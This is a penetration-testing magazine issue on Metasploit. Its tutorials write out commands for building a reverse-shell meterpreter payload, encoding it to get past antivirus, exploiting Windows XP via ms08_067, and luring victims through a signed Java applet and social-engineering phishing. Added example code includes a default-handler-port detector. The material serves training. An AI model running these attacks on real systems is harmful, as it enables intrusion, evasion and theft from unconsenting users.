
Cyber Security Auditing Software
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
The network scanning phase of a penetration assessment will quickly identify a number of security
weaknesses and services running on the scanned systems. This enables a tester to quickly focus on
potentially vulnerable systems and services using a variety of tools that are designed to probe and
examine them in more detail, e.g. web service query tools. However, this is only part of the picture,
and a more thorough analysis of most systems will involve having administrative access in order to
examine in detail how they have been configured. In the case of firewalls, switches, routers and other
infrastructure devices this could mean manually reviewing the configuration files saved from a wide
variety of devices. Although various tools exist that can examine some elements of a configuration,
the assessment would typically end up being a largely manual process. Nipper Studio is a tool that
enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of
network infrastructure devices. Nipper Studio does this by examining the actual configuration of the
device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.
Ian has been working with leading global
organizations and government agencies to
help improve computer security for more
than a decade.
He has been accredited by CESG for his security and
team leading expertise for over 5 years. In 2009 Ian
Whiting founded Titania with the aim of producing
security auditing software products that can be used by
non-security specialists and provide the detailed
analysis that traditionally only an experienced
penetration tester could achieve. Today Titania's
products are used in over 40 countries by government
and military agencies, financial institutions,
telecommunications companies, national infrastructure
organizations and auditing companies, to help them
secure critical systems.
With Nipper Studio penetration testers can be experts in
every device that the software supports, giving them the
ability to identify device, version and configuration
specific issues without having to manually reference
multiple sources of information. With support for around
100 firewalls, routers, switches and other infrastructure
devices, you can speed up the audit process without
compromising the detail.
You can customize the audit policy for your customers' specific
requirements (e.g. password policy), audit the device to that
policy and then create the report detailing the issues identified.
The reports can include device-specific mitigation actions and be
customized with your own company's styling. Each report can then
be saved in a variety of formats for management of the issues.
Why not see for yourself, evaluate for
free at
Copyright 2014 Hakin9 Media Sp. z o.o. SK
Introduction to Metasploit
By Manasdeep
Get general information about Metasploit functions. The author answers the main questions
about Metasploit and describes the methodology for running it.
Hacking Hands-on
By Jordan M. Bonagura
If you want to know how to hack a system but this is a new field for you, the article gives you a
simple and easy way to become a professional.
How to Hack Windows in 5 minutes
By Rafael Fontes Souza
Step-by-step guide on how to exploit Microsoft Windows 8. Graphical images will help you easily
understand each step! As a BONUS, the author gave an interview. You can check it below the article!
Metasploit and Penetration Testing
By Maher Abdelshkour
Everything you need to know about Metasploit is in one article. Find out general facts and
commands about Metasploit to become a professional pentester!
Multiphase Penetration Testing: Using BackTrack Linux, Metasploit, and Armitage
By Lance Cleghorn
A clear description of each phase of pentesting for those who want to find out about common
attacks. Easy, simple and understandable!
Pentesting Windows using Metasploit Framework
By Omkar Prakash Joshi
The article demonstrates all attacks in a virtual environment. Learn how to create security tools
and exploits through the Metasploit Framework.
Metasploit for Exploits Development: the Tools Inside the Framework
By Guglielmo Scaiola
Graphical interpretation of the attack. The author will show you how you can take advantage of
the framework and how easy it is to use it!
Pentesting with Metasploit Pro
By Cristian Stoica
Get to know additional features of Metasploit and its Pro version. Go through the whole process
from running a penetration test to writing a report.
HeartBleed Bug Exploiting with Metasploit
By Alessandro Parisi
The author shows the nature of the Heartbleed bug and its impact on a server. Become aware of the possible
damage in order to prevent it!
Exploit a Vulnerability with Metasploit
By Azza Nafti
Explore Metasploit and a security vulnerability in brief. The author gives you a small example to
show theory through practice.
Dear PenTest Subscribers,
We are proud to present a brand new PenTest Magazine. As you might have already noticed, we upgraded
our website, and we are going to improve a lot of things, because we are changing for you.
In the new issue, we are highlighting the secrets of Metasploit. If you have ever thought about how to hack Windows in
5 minutes, you'll get an answer. In this article everybody is going to understand techniques for exploiting
the operating systems Microsoft Windows 8 and Windows 7 SP1, of course only for teaching purposes, so that
network administrators and security specialists understand how the attacker's mind works and can prevent the attack.
Our authors have prepared a set of features explaining the types of Metasploit attacks, and ideas on how to
prevent being hacked. You will get to know everything about pentesting with Metasploit Pro, the tools inside the
framework, and Heartbleed bug exploiting with Metasploit. You will also find out about Multiphase Penetration
Testing: Using BackTrack Linux, Metasploit, and Armitage.
We are sure that you will like working with Metasploit; we put much effort into explaining everything step
by step for you.
Best wishes from PenTest Magazine
Editor in Chief: Milena Bobrowska
Managing Editor: Milena Bobrowska
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Abishek Kar, Phil Patrick,
Steven Wierckx, Krishore PV, Tim Thorniley, Tom Updegrove,
Elia Pinto, Brandon Dixon, Ivan Gutierrez Agramont, Sandesh
Kumar, Pradeep Mishra, Amit Chugh, Johnette Moody, Steven
Hodge, Micha Stawieraj, Kashif Aftab, Jeff Smith, Jordi
Rubio, Mardian Gunawan, Arnoud Tijssen, David Kosorok,
Mbella Ekoume, Viswa Prakash, Michal Jahim.
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be
a PenTest magazine.
Senior Consultant/Publisher: Pawel Marciniak
CEO: Ewa Dudzic
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
Publisher: Hakin9 Media Sp. z o.o. SK
02-676 Warsaw, Poland
ul. Postepu 17D
Phone: 1 917 338 3631
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
The techniques described in our articles may only be
used in private, local networks. The editors hold no
responsibility for misuse of the presented techniques
or consequent data loss.
You can talk the talk.
Can you walk the walk?
Advancing Computer Science
Artificial Life Programming
Digital Media
Digital Video
Enterprise Software Development
Game Art and Animation
Game Design
Game Programming
Human-Computer Interaction
Network Engineering
Network Security
Open Source Technologies
Robotics and Embedded Systems
Serious Game and Simulation
Strategic Technology Development
Technology Forensics
Technology Product Design
Technology Studies
Virtual Modeling and Design
Web and Social Media Technologies
Please see for the latest information about
degree program performance, placement and costs.
Introduction to Metasploit
by Manasdeep
Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.
It provides an end-to-end framework for penetration testing, covering:
Information gathering
Vulnerability Scanning
Pre Exploitation
Post Exploitation
Exploit Development
Metasploit's greatest advantage is that it is open source and freely extensible. You can customize it by
including your own exploits and payloads as needed. A pentester can check the custom-made
applications specific to an enterprise against customized exploits and payloads. If a security researcher
crafts a new attack, a custom-made payload can carry out most of the attack's purpose.
Today, software vulnerability advisories are often accompanied by a third-party Metasploit exploit module
that highlights the exploitability, risk, and remediation of that particular bug.
Architecture of Metasploit
For the sake of simplicity, we shall concentrate only on the interface and module parts of Metasploit in
this article.
Platform Used for demonstration
We are demonstrating Metasploit features with the help of Backtrack OS. All screenshots of Metasploit at work
are taken from there. We have a VMware image of Backtrack 5 R1 OS with this configuration:
We log in to Backtrack 5 R1 OS with the username root and the password toor. Type startx to load the GUI
screen of Backtrack 5.
Metasploit is typically found at this location in Backtrack OS:
Metasploit Interfaces
Msfconsole: The console, and the most powerful of all the interfaces. It can support multiple sessions.
Msfcli: Single-command interface. Supports only one session.
Msfd: Provides a network-based interface to msfconsole.
Msfweb: This is the web-based interface.
Good Practices for using Metasploit
Updating via Msfupdate
It is always beneficial to have an updated Metasploit framework before beginning to work with it. This way we
stay current on all the exploits and payloads offered for the framework. We use the Msfupdate utility to
update the Metasploit framework.
Here is the path for the Msfupdate utility:
Port scanning via Nmap
It is a good idea to identify the open ports and the services running on them using a versatile tool such as
nmap. It gives us a clearer picture of which areas and ports we need to focus our energy on to run the exploit.
Knowing the service version number helps us greatly in selecting the known exploits available in Metasploit
with their associated payloads.
Here is an example of the nmap scan:
Meterpreter: Metasploit's Payload
A payload is the piece of software that lets you control a computer system after it has been exploited. It is
typically attached to the exploit. Meterpreter is the best-known payload of Metasploit. Meterpreter enables
users to control the screen of a device using VNC and to browse, upload and download files.
What do payloads typically allow you to do after execution of an exploit?
Add a new user to the victim machine
Open a command prompt on a specific port of the victim system and run commands from there
Reverse-connect a command shell to issue commands from your end
What is a meterpreter?
Meterpreter is short for Metasploit Interpreter, a powerful payload that allows you to do many
things on the compromised system, such as manipulating local files. It is used to write and execute
advanced commands on the default shell of the victim system.
What makes Meterpreter so powerful?
Meterpreter runs in the memory of the exploited process, which makes it very quiet and stealthy and helps it evade
detection by antivirus and other analysis tools. It leaves very few traces on the compromised system
while giving the attacker maximum room for activities such as navigating the local file system,
port forwarding, tunnelling connections from the victim machine to other systems, pushing registry entries, modifying
network configuration, downloading confidential files, etc. In short, once you get Meterpreter running you
can do pretty much anything on the hacked system.
How is this achieved?
Meterpreter achieves this by providing an API on which programmers can write their own extensions, which
are uploaded as shared DLLs running within the memory of the exploited process.
How is this helpful to pentesters?
Using Meterpreter, Metasploit avoids executing a new process or sub-process and maintains the stealthiness
of the attack. It comes with built-in commands and extensions that allow obtaining system information,
configuring port forwarding, and uploading and executing binaries and DLLs. It largely evades
detection by most analysis tools.
Running Metasploit
This is the path for running Metasploit from Backtrack OS:
Once started, we get the msfconsole as follows:
Methodology for running an exploit from msfconsole commands
show exploits: This command gives you the extensive list of exploits available in Metasploit.
use <exploit name>: Selects the exploit to use against your victim machine.
show payloads: Lists the names of the available payloads specific to the exploit chosen.
set PAYLOAD <payload>: Sets the payload that is actually executed after successful execution of your chosen exploit.
show OPTIONS: Lists the options such as RHOST and TARGET, followed by their values, associated with the
selected exploit and payload.
exploit: Executes the exploit against the target (victim's) system.
If the exploit executes successfully, the payload embedded in it is injected into the victim machine to carry
out the intended activity. If it is unsuccessful, the corresponding error message is shown.
Many times during payload execution we come across bad characters, such as the null (0x00) byte or newline
characters, which can be trapped by the target application if it uses sanitization filters on received input.
The msfencode utility (used below) helps us encode the exploit and get rid of bad characters in order to bypass those
input filters. It also significantly reduces the danger of being caught by an IDS.
Suppose we are producing the Meterpreter executable met.exe as follows: Code:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /var/www/met.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444
Now, when we try to download this file from the victim PC, we get an error message because the antivirus
has detected an intrusion attempt. Let us see what happens when we apply encoding: Code:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -
-t exe > /var/www/metenc1.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Notice the size of the file changed from Length: 290 to size 318. The text marked in blue shows us that the
attack has been successful.
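As an added example that is not from the original article, the Python helper below parses a bad-character list in the \x00\x0a\x0d notation that Metasploit modules use and reports every offset at which a raw payload blob contains one of those bytes, which is the check a tester runs before deciding whether an encoder such as the one above is needed at all; the sample blob is constructed and is not shellcode.

```python
import re

# Constructed sample blob (printable letters with NUL, LF and CR mixed in);
# it is NOT shellcode, only a stand-in for a raw payload to be checked.
SAMPLE_BLOB = bytes.fromhex("41424300444546470a48490d4a4b004c")

# The three bytes the article singles out: the null byte plus the newline pair.
DEFAULT_BADCHARS_SPEC = r"\x00\x0a\x0d"


def parse_badchars(spec):
    r"""Turn a Metasploit-style badchar string like r"\x00\x0a\x0d" into a set of byte values."""
    hexes = re.findall(r"\\x([0-9a-fA-F]{2})", spec)
    if not hexes:
        raise ValueError("no \\xNN escapes found in badchar spec: %r" % spec)
    return {int(h, 16) for h in hexes}


def find_bad_chars(payload, badchars):
    """Return {byte_value: [offset, ...]} for each bad byte present in payload.

    An empty dict means the blob is clean with respect to that badchar set and
    would not need to go through an encoder for input-filter reasons.
    """
    hits = {}
    for offset, value in enumerate(payload):
        if value in badchars:
            hits.setdefault(value, []).append(offset)
    return hits


def is_clean(payload, badchars):
    """True when payload contains none of the given bad bytes."""
    return not find_bad_chars(payload, badchars)


def report(payload, spec=DEFAULT_BADCHARS_SPEC):
    """Human-readable summary, one line per offending byte value."""
    hits = find_bad_chars(payload, parse_badchars(spec))
    if not hits:
        return "clean: %d bytes, no bad characters" % len(payload)
    lines = ["%d bytes, %d bad byte value(s) present:" % (len(payload), len(hits))]
    for value in sorted(hits):
        offs = ", ".join(str(o) for o in hits[value])
        lines.append("  0x%02x at offset(s) %s" % (value, offs))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_BLOB))
```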
How does it help the pentester?
The pentester has more control and flexibility in crafting payloads and sending them to the target. He can
now be more creative in encapsulating payloads for delivery to the destination host machine to
achieve the exploit's objective.
Automating the Pentest
We can completely automate a pentest, from scanning remote systems to identify vulnerabilities to launching
exploits against those systems.
We have the following options to import reconnaissance data:
db_import_nessus_nbe: Import an existing Nessus NBE output file
db_import_nmap_xml: Import data from an existing Nmap XML output file
db_nmap: Execute Nmap through the framework and store its results in the database
The db_autopwn command references the reconnaissance data, links it up with matching exploit modules,
selects exploit modules based on open ports and launches them against the matched targets.
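The nmap step above and the db_import_nmap_xml option both revolve around Nmap's XML output. As an added example that is not part of the original article, the Python below parses a constructed Nmap XML document (the nmaprun/host/ports layout that nmap -oX writes) into the host, port, service and version records that the import step loads and that the tester then matches against exploit modules; down hosts and non-open ports are dropped along the way.

```python
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output (not a real scan); the element
# structure follows the nmaprun/host/ports/port/service layout of nmap -oX.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/29">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="closed"/>
        <service name="ms-wbt-server"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="udp" portid="161">
        <state state="open|filtered"/>
        <service name="snmp"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port on a live host.

    Each dict carries host, protocol, port, service name and the
    product/version banner Nmap recovered (empty when -sV found nothing).
    Down hosts and ports that are not plainly "open" (closed, open|filtered)
    are skipped because they give the exploit-selection step nothing to use.
    """
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            results.append({
                "host": addr,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": name,
                "banner": " ".join(p for p in (product, version) if p),
            })
    return results


def open_ports_by_host(results):
    """Group parsed records into {host: [port, ...]} for a quick overview."""
    grouped = {}
    for r in results:
        grouped.setdefault(r["host"], []).append(r["port"])
    return grouped


if __name__ == "__main__":
    for entry in parse_nmap_xml(SAMPLE_NMAP_XML):
        print("{host}:{port}/{proto}  {service:14s} {banner}".format(**entry))
```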
Using db_autopwn
Auxiliary Module system
The Auxiliary module system is a collection of exploits and modules that add to the core capability of
the framework. They are mainly suited to information gathering. These are automated scripts
performing a certain task; we can specify single or multiple ranges to be targeted. Popular uses are port
scanning, fuzzers, DoS scripts, etc.
Popular Auxiliary Modules
scanner/smb/version: Determine the operating system version and service pack level of a Windows target
system using SMB fingerprinting. Use info for more information.
scanner/discovery/sweep_udp: Scans a single host or a specified range of hosts for UDP services, and
decodes the results. E.g.:

Searching Auxiliary modules:
We can narrow down our search to a few modules by using the search operator. E.g., search all modules with
How is it helpful to pentesters?
The auxiliary module system allows excellent information gathering activities, matching systems to
available exploits, executing exploits, managing the multiple exploit sessions, and storing all of this
information in a database.
Social Engineer Toolkit
This toolkit was created to fill the gap between penetration testing and social engineering. It helps
tremendously to craft a clever malicious file and trap innocent users into clicking on it. The interface is very simple
to use: just select the option number in the menu and we are good to go!
We can access the SET toolkit as follows:
We are greeted with the SET toolkit splash screen:
Now, in this menu-driven program, all we have to do is select our attack vector, craft it as per the instructions
and send the link / email to the user. When the innocent user opens the link or attachment, they fall victim to our
social engineering tricks and we have easy access to their system.
We can try all the options in the SET toolkit menu and follow the instructions accordingly to launch a
successful attack to compromise the victim machine.
How is this helpful to pentesters?
Pentesters can now readily demonstrate to management how an attacker with malicious intent can abuse the
trust of the people in the organization to gain access to the most sensitive information. By running and
presenting real-world phishing tests, it can be shown that social engineering is the strongest threat to
the organization: its target is people, not systems, as the way to get at confidential information.
General Precautions for using Metasploit
Metasploit is no doubt a very powerful and handy tool for effective and thorough penetration and exploit
testing. But if used improperly, it may result in very unpleasant situations where a whole server might be forced
to shut down during testing, costing an organization millions. Here are some good practices to follow
whenever we are going for penetration and exploit testing.
a. Proper backup: It is highly recommended that backups be taken before any penetration exercise
is undertaken; otherwise the loss of information, and its unavailability in the meantime, might prove fatal to the
business if something goes wrong. The backup works as a second line of defense.
b. Prior management approval: It is crucial that a proper written authorization letter is obtained from
management before proceeding with any exploit testing. This removes the burden of facing legal
lawsuits if things go wrong.
c. Inform first, and then exploit: A good rule of thumb is to inform senior management about the risk
and ask for their call on the issue. If you receive the green signal to proceed with the exploitation part, obtain
written approval and then demonstrate.
d. Training: Security awareness is the strongest deterrent against the risk of valuable information leaking.
Through a live demonstration of SET, show the IT and other office staff how to stay on guard and avoid
falling victim to social engineering methods.
Metasploit is helpful in determining whether a given vulnerability is actually exploitable. It lets us know if
there is actually a risk associated with the vulnerability that can be exploited. This automatically weeds out
the false positives that are typical of many automated scanners. Automated scanners
don't tell you whether a vulnerability is a real risk, as they don't check it against a known exploit, but
Metasploit does. Hence, a better risk assessment judgment can be made using Metasploit.
Metasploit is also frequently used by pentesters to demonstrate the potential extent of the
damage an attacker is capable of after a successful break-in, through post-exploitation activities. This can
also help us to better rate the severity of the risks associated with the discovered vulnerability of the system.
Hacking Hands-on
by Jordan M. Bonagura
When I decided to write this article, I thought of working with a model without a lot of
theory and much more hands-on. The goal is to write for an audience of beginners who want
to know how to hack a system but don't have any idea how to do it.
I'm sure that the usual article must have all the technical stuff to prove why it's possible and, more than that, to teach
what happens in each step, but in this case I chose to write something for the guy who wants to hack for the
first time, so that, in my opinion, he can be motivated to learn more and more and start to discover a new
hacking world.
I have to emphasize here the importance that any kind of test should be performed in your own environment,
with your own virtual machines, and always for ethical purposes.
So, let's talk about our environment: we'll use 2 different virtual machines with the
configurations below:
O.S. IP Address
Windows XP
With the right environment, we can go to the next step.
Using the Backtrack machine, we can start the Metasploit application with the msfconsole command.
Before we start to hack, we can look at some interesting commands, for example the version we are using,
with the version command in the Metasploit prompt, and get some help with the help command.
Figure 1. Help msfconsole
To see the exploits and know more about each one, you can run the show exploits command inside the
Metasploit prompt.
Figure 2. Show exploits command msfconsole
Environment 1 Windows XP
info windows/smb/ms08_067
use windows/smb/ms08_067
show options
set RHOST
set target 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
check
exploit
Figure 3. Info command msfconsole
Figure 4. Show options command msfconsole
After running the exploit there will be an open session where you can type the pwd command and check
that you are inside C:\Windows\System32. Another command that can be used is sysinfo, which shows you
detailed information about the O.S.
Now that you've learned how to hack Windows XP, you need to go deeper and begin to understand
how these exploits really work and how they use technical skills to exploit vulnerabilities. You can try to
understand some concepts of computer networks and operating systems too.
Remember, only by studying the concepts will you really be able to succeed in your hacking strategies.
In my next article I will show how to exploit a Linux O.S. using Metasploit.
About the Author
CEO Hades Coding
Consultant and Researcher in Information Security / CEH
Stay Safe Podcast Founder
Computer Scientist
Postgraduate in Business Strategic Management, Innovation and Teaching
Founder Vale Security Conference Brazilian Conference
Consultant Member Brazilian Commission of High Tech Crime (OAB / SP)
Coordinator and Teacher in IT area
SJC Hacker Space President
Speaker (CNASI, AppSec California, H2HC, Angeles Y Demonios, Silver Bullet,
Seginfo, ITA, INPE, etc)
How to Hack Windows in 5 minutes
by Rafael Fontes Souza (CISO of HackersOnlineClub)
Readers, in this article everybody is going to understand techniques for exploiting
the operating system Microsoft Windows 8 (only for teaching purposes, so that network
administrators and security specialists understand how the attacker's mind works and can prevent the
attack). Through Metasploit you will learn how to hack machines running a vulnerable Windows
OS, such as Windows 7 SP1. Other OSes are also applicable.
This exploit works using the Java Signed Applet method in any browser, but requires the Java plugin to be
installed. A .jar file is created, and it is necessary that the target open a URL and allow the Java applet to run
in the browser. The applet is presented to the target through a web page. The victim's Java Virtual Machine
will pop up a window asking whether they trust the signed applet; after the victim clicks Run, the applet
runs with full permissions.
Step By Step
Requirements for the pentest:
1. You must have the Windows 8 operating system installed.
2. Some target computer or VMware (virtual machine) with a Linux distribution; it can be Backtrack, Kali or
whatever, the important thing is to have Metasploit up and running.
First, you need to open the terminal and enter the command:
Figure 1. Open metasploit
Next, we choose the exploit to use:
Let's type use exploit/multi/browser/java_signed_applet.
Press Enter and type show options.
Figure 2. Use exploit and show options
Essential concepts
SRVHOST and SRVPORT have defined default values, and 8080. SRVHOST is the IP
address on which the server will listen to serve the connection URL that the target browser opens. If SRVHOST
is set to , the target must be able to connect to this machine using your public IP.
Figure 3. Set payload
LHOST should be the IP address that the victim connects back to.
Figure 4. LHOST and exploit
When the target opens this link in their browser, a warning is displayed in a dialog box.
A window will open, and the victim can check "I accept the risk and want to run this application" and click Run.
Figure 5. Java applet
Therefore, after the victim opens the malicious URL and clicks Run, Metasploit will start a Meterpreter
session to the target machine, and you get full access!
You can run sessions -l directly to see the active sessions. Example: sessions -i 1, where 1 is the ID of the
session. The applet is able to connect to Metasploit.
The Meterpreter session starts and is ready, as planned, with the available options for you to exploit the system.
Figure 6. Session starts
This article is only for ethical hacking, now you can have fun with the commands.
Figure 7. Webcam shot: Just 4 fun
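Both this article's callback server (SRVPORT 8080) and the reverse_tcp handler in the Introduction to Metasploit article (LPORT=4444) use Metasploit's default ports. As an added defender-side example that is not part of either article, the Python below scans constructed firewall log lines for internal hosts making allowed outbound connections to those defaults, and for several internal hosts calling back to the same external host and port; the log format and the 10.0.0.0/8 internal range are assumptions, and the heuristic catches lab-default handlers only.

```python
import ipaddress
import re
from collections import defaultdict

# Default ports from the two articles: the meterpreter reverse_tcp handler
# (LPORT=4444) and the java_signed_applet web server (SRVPORT 8080).  Both
# are freely changeable, so a hit is a lead for triage, not proof of compromise.
DEFAULT_HANDLER_PORTS = {4444, 8080}

# Address space the defender owns (assumed); everything else is external.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed firewall log in a simple key=value style (not a vendor format).
# 192.0.2.5 plays the external handler in this sample.
SAMPLE_LOG = """\
2014-05-01T10:01:02Z fw1 action=allow proto=tcp src=10.0.0.15 dst=198.51.100.7 dport=443
2014-05-01T10:01:05Z fw1 action=allow proto=tcp src=10.0.0.15 dst=192.0.2.5 dport=8080
2014-05-01T10:01:06Z fw1 action=allow proto=tcp src=10.0.0.15 dst=192.0.2.5 dport=4444
2014-05-01T10:02:11Z fw1 action=allow proto=tcp src=10.0.0.23 dst=192.0.2.5 dport=4444
2014-05-01T10:02:40Z fw1 action=allow proto=tcp src=10.0.0.42 dst=10.0.0.9 dport=4444
2014-05-01T10:03:00Z fw1 action=deny proto=tcp src=10.0.0.31 dst=192.0.2.5 dport=4444
2014-05-01T10:03:15Z fw1 action=allow proto=udp src=10.0.0.15 dst=198.51.100.53 dport=53
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) action=(?P<action>\w+) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)


def is_internal(addr):
    """True when addr falls inside one of the defender's own networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        ev = m.groupdict()
        ev["dport"] = int(ev["dport"])
        events.append(ev)
    return events


def outbound_to_default_handler(events):
    """Allowed TCP flows from an internal host to an external one on a default handler port.

    Denied attempts and internal-to-internal flows are left out here; the
    former may still deserve a separate look if they repeat.
    """
    return [
        ev for ev in events
        if ev["action"] == "allow"
        and ev["proto"] == "tcp"
        and ev["dport"] in DEFAULT_HANDLER_PORTS
        and is_internal(ev["src"])
        and not is_internal(ev["dst"])
    ]


def shared_callback_targets(hits, min_sources=2):
    """Group hits by (dst, dport) and keep targets reached by several internal hosts.

    Several victims calling back to one host and port is the shape a single
    reverse_tcp listener produces when more than one machine was exploited.
    """
    by_target = defaultdict(set)
    for ev in hits:
        by_target[(ev["dst"], ev["dport"])].add(ev["src"])
    return {t: sorted(s) for t, s in by_target.items() if len(s) >= min_sources}


if __name__ == "__main__":
    flagged = outbound_to_default_handler(parse_log(SAMPLE_LOG))
    for ev in flagged:
        print("%s  %s -> %s:%d" % (ev["ts"], ev["src"], ev["dst"], ev["dport"]))
    for (dst, dport), srcs in shared_callback_targets(flagged).items():
        print("shared handler %s:%d reached by %s" % (dst, dport, ", ".join(srcs)))
```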
About the Authors
Rafael Fontes Souza
Rafael Fontes Souza is Chief Information Security Officer of HOC and Business Partner at Voice of Green Hats
Company. He communicates well in groups and with the general public, started studying at thirteen years of age (SQL
databases), and has extensive experience in operating systems such as Linux, UNIX, and Windows. He is a member of the
French Backtrack Team; in the Backtrack Team project he made partnerships with groups from France, Indonesia
and Algeria, and prepared a collection of video lessons made available on the website. He is the founder of Wikileaks
and Intelligence, actively helps to increase the security of and develop software for HackersOnlineClub (Indian), and
contributes to magazines and websites from countries like Poland, Pakistan, USA and others.
Ziaullah Mirza
Ziaullah Mirza (founder of Voice of Green Hats) is a mature and enthusiastic individual who believes
in climbing the ladder with honesty and hard work. He possesses a strong personality and excellent
communication and interpersonal skills. He is equipped with the ability to respond to queries,
handle problems analytically, assess a situation and then resolve the problem quickly and
professionally. He is highly motivated, eager to learn and able to work under busy/stressful conditions
to be one of the leading roles within the organization, in view of new technology and competitiveness
in the educational market and sustainability of the job market.
(Owner: VOICE OF GREEN HATS) AND RAFAEL FONTES SOUZA (Chief Information Security Officer)
What kind of vacancies do you have for penetration testers? For which kind of projects?
We normally hire Ethical Hacks/ security professional for Cyber Security projects. Project nature could be
for Pen-testing cyber tools in order to deploy for educational institutional. Some project related to reverse
Engineering of viruses or Trojans in order to find the reality and inside of it.
How many penetration testers does your company hire? Do you look for them ongoing?
As we hire for period of projects so a number of pen-testers are required may vary, sometimes 10 to 50 and
sometimes this amount is only 2 to 3 individuals
What does your recruitment process look like?
It is quite clear and open for those who are interlinked with our forums or network. To evaluate the whole
process with a team of experienced and highly qualified people, but we always try our best to make set.
What certifications are required, and what certifications are a plus?
As you know Voice of Green Hats is training and solutions provider so we always look for those guys
who are certified by Voice of Green Hats so we normally look for certificate like Executive Certificate in
Cyber Security ECCS.
What are the characteristics or traits of the top testers you have at the moment?
They are highly qualified and best performers in their tasks. They have experience for International projects
in Pen-testing and have been awarded accordingly.
If I were to ask your pentesters about working for your company what would they say?
I am confident they will respond in a positive way, as they are working in a professional environment with
life-entertaining facilities as well. Working with Voice of Green Hats (VOGHs) is not so strict that you have to
present yourself physically in the office. They can choose the way they are going to perform the task easily.
Sometimes people need their selected environment that we might not able to provide etc as long as project is
done professionally and perfectly.
What is the average tenure of the testers working here?
As I said, it always depends on the project they are working on. Sometimes it is short like weeks or
sometimes it is years.
What is the strategic direction of the company? How you involve testers in this strategy?
Strategic direction is one of trade secret for us. As the founder of Voice of Green Hats I keep this secret
with me. But as you questioned here I would like to tell the main tool that is CI Competitive Intelligence.
You can also get this experience by taking ECCS course or one of our certificate related to CI. I am sure, you
will not divert your direction thinking I do strategic marketing of my certification here in interviews.
What value can pentesters lend to the strategic mission of the company?
They are all working on the directions given by project manager or project directors. But key structure of
strategic approach is unidirectional and that is where I am watching it.
What is the greatest challenge pentesters face in your company?
Have you ever closely looked at the law enforcement organizations around the world? They are all backed
by governments, agencies, etc. with all the facilities of life and payment to make them work harder, as
well as encouragement to work diligently. But our pentesters only have payment for the work they do. I cannot
encourage them as well as governments do. But I still try my best.
What makes your company superior to your competitors?
Our work speaks for itself; we don't compete with anyone in the Cyber World, and that is what makes us superior to
all those who consider themselves our competitors.
How do you attract TOP pentesters?
Our name brings them to us.
Hi, thanks for giving me your time. Please introduce yourself to our readers.
A: Hey guys, my name is Rafael Fontes Souza. I am the CISO of HackersOnlineClub, Founder of the
Wikileaks, and Intelligence, and now in partnership with the Voice of Green Hats company; my main interests
include cryptography, security research and penetration testing. In my free time I like to write for websites
and magazines where I have the opportunity to convey my knowledge.
Rafael, tell me more about your partnership with Voice of Green Hats?
I am currently writing a book on cryptography (covering the most advanced quantum and classical techniques)
and we plan to turn it into a certification...
What are the biggest challenges that the field of information security is suffering from?
It is known that a lot of espionage is carried out by some governments and also by competitors. They should
remember that privacy is important; encryption is a positive and honest way to protect sensitive data. If there
is no respect between nations, cyber war can be the scenario.
What advice would you suggest to new Hackers?
Be humble, always keep studying and seek help from the more experienced; make the right choice
wherever you are, and act ethically.
Metasploit and Penetration Testing
by Maher Abdelshkour
When you ask about a penetration testing tool, the first thing that comes to my mind is the
world's largest Ruby project, with over 700,000 lines of code: Metasploit. So what exactly
is Metasploit?
In this article, you will learn about the following:
What is Metasploit
Metasploit terms and definitions
What is msfpayload
Important Metasploit commands
Metasploit reliability rankings
